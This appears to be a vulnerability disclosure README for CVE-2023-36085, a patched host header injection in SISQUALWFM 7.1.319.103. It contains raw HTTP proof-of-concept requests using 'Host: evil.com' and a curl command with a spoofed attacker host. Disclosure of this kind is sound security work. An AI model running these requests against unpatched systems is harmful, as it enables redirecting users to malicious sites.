This repository contains information related to a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.
- Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
- Discovered Date: 17/03/2023
- Reported Date: 17/03/2023
- Resolved Date: 13/10/2023
- Exploit Author: Omer Shaik (unknown_exploit)
- Vendor Homepage: SISQUALWFM
- Version: 7.1.319.103
- Tested on: SISQUAL WFM 7.1.319.103
- Affected Version: SISQUALWFM 7.1.319.103
- Fixed Version: SISQUALWFM 7.1.319.111
- CVE: CVE-2023-36085
- CVSS Score: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Category: Web Apps
We provide a proof-of-concept scenario demonstrating the host header injection vulnerability, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability allows an attacker to manipulate webpage links or redirect users to another site by tampering with the host header.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...
To exploit this vulnerability, an attacker can use the following curl command to modify the host header:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvvThis repository is for informational purposes only and should not be used for any malicious activities. The vulnerability has been responsibly disclosed to the vendor, and the issue has been resolved. It is crucial to follow ethical hacking guidelines and respect responsible disclosure practices when identifying and reporting vulnerabilities.